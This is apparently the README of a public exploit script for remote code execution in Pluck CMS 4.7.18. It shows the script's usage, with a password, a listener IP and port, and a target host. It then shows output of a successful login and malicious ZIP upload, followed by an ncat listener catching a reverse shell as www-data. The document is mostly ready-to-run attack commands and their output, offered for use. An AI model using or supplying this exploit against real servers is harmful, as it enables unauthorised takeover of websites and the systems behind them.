Pluck_Cms_4.7.18_RCE_Exploit

Automated script in the creation of php and zip file for upload, this script is based on Pluck Cms 4.7.18 RCE.

Use:

❯ python3 exploit_pluckv4.7.18_RCE.py
usage: exploit_pluckv4.7.18_RCE.py [-h] --password PASSWORD [--filename FILENAME] --ip IP --port PORT --host HOST

We run the exploit with the following parameters

❯ python3 exploit_pluckv4.7.18_RCE.py --password your_password --ip 10.10.10.10 --port 443 --host http://127.0.0.1

[+] Creating payload
[+] Overwriting .php file
[+] Creating ZIP file
Login successful
[+] ZIP file uploaded successfully

We listen with ncat

❯ ncat -nvlp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.10.
bash: cannot set terminal process group (1114): Inappropriate ioctl for device
bash: no job control in this shell
www-data@localhost:~/html/pluck/data/modules/mirabbas$ 

Original repository:

• https://github.com/1mirabbas/Pluck_Cms_4.7.18_RCE_Exploit/tree/main
• https://www.exploit-db.com/exploits/51592
• https://youtu.be/GpL_rz8jgro